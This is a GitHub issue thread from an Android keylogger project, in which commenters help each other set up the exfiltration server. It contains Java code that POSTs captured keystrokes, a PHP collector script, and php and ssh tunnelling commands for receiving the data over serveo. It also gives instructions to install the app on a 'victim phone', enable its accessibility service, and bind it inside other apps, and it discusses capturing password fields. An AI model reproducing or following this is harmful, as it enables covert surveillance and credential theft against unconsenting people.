### ISSUE TITLE
Timestamp

### ISSUE THREAD

**Issue by 12udy** [bshu2/Android-Keylogger#1]
@bshu2
Hi there,
Good job;
**How did u set up the server page for that? Is it gcp?**

**Comment by zonavip** [comment]
Lo que hice yo, fue cambiar la parte donde se hace el envio post al servidor, te copio el codigo aqui:

BasicNameValuePair textBasicNameValuePAir= new BasicNameValuePair("Text", params[0]);

List<NameValuePair> nameValuePairList = new ArrayList<NameValuePair>();
nameValuePairList.add(textBasicNameValuePAir);

UrlEncodedFormEntity urlEncodedFormEntity = new UrlEncodedFormEntity(nameValuePairList);
httpPost.setEntity(urlEncodedFormEntity);



y del lado de php o cualquier lenguaje te va llegar un POST en la variable "Text"

Saludos
Nahuel

**Comment by dedsec1911** [comment]
@zonavip 
How did you manage to write the server sided code on PHP.
Can you elaborate ?

**Comment by zonavip** [comment]
whats?

Obtener Outlook para Android<https://aka.ms/ghei36>

________________________________

**Comment by dedsec1911** [comment]
@zonavip 
But why should I download Outlook ?

**Comment by dedsec1911** [comment]
Okay, It took me a while but I have completed porting the server part from "Go" to "PHP".
If you want to take a look contact me !

**Comment by dedsec1911** [comment]
@zonavip Yes your code helped me a lot, but still there's a problem in getting the "password" field texts, maybe it's all to do with that "TEXT MASK".
Passwords inputs are shown as 'null' or '0' value !

**Comment by tux0n** [comment]
Hi can you post php code? I was trying to deploy go code on google appengine but it not work for me

**Comment by dedsec1911** [comment]
@mario8883 Yes I can but I need a little donation for that !

**Comment by zonavip** [comment]
Contact me

**Comment by dedsec1911** [comment]
@zonavip Who me ?

**Comment by vanshsantoshi** [comment]
If you want to use this keylogger , and you don't have a website , you can use serveo to make a listener.
Change that 

```https://cs460-android-keylogger.appspot.com```

link on Keylogger.java file with 

```https://anythingHere.serveo.net/keys.php```

And compile it ,install it, enable accessibility option in settings for it 

Then , here is that php file you requested 
Well , it's not same as the developer made , but it'll throw every data to ```test.txt```  
file on the same directory 

``` 
<?php	 		
     file_put_contents('test.txt', 
file_get_contents('php://input'),FILE_APPEND);   
?>   
``` 

And name it keys.php , and put it in on any directory 

Then , run your own website for receiving data 

``` php -S localhost:4444 -t /location/of/folder/where/is/the/keys.php/FileIsLocated ```

``` ssh -R anythingHere:443:localhost:4444 serveo.net ```

(You'll need php and openssh / autossh packages , install them using apt-get install )

Then , your https://anythinHere.serveo.net/keys.php link can be accessed through the internet !

Now , connect the victim phone to the internet ,install that keylogger , enable its accessibility service in settings it'll start keylogging every stuff ! (Personally tested , and it's damn good !)

My contact info:-
(Telegram :- ``` "Retrocausality" , ever heard of it? ```
or @TermuxSucks)
(Mail:- vanshsantoshi3345@gmail.com)

**Comment by vanshsantoshi** [comment]
You can bind / embedded this keylogger on apps too , and it works great
